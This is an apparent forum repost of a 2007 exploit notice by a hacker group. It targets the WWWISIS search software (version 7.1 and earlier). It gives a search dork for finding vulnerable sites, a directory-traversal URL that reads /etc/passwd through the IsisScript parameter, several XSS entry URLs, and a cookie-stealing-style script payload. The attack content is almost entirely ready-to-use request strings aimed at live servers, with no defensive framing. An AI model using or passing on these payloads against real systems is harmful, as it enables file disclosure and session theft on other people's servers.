WWWISIS <= 7.1 (IsisScript) Local File Disclosure/XSS Vul

Ras · October 20, 2007

 WWWISIS (Search) Multiple Vulnerabilities
# Download:
# [url]http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2[/url]
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# [url]www.spanish-hackers.com[/url]
# d0rk: powered by WWWISIS
#Stop lammer


# Local File Disclosure Vulnerability:

[url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=[/url][file]
[url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd[/url]


# Exploit In (XSS):

[url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft?=i[/url]
[url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft?=e[/url]
....

[ i,e ... ] it is the language of script

# Cross Siting Scripting:

<script>alert(document.cookie)</script>


//---------------------------------------\\

Greetz To: All Hackers
JosS!

Sign In

WWWISIS <= 7.1 (IsisScript) Local File Disclosure/XSS Vul

Recommended Posts

Ras

Join the conversation

Browse

Activity

Pages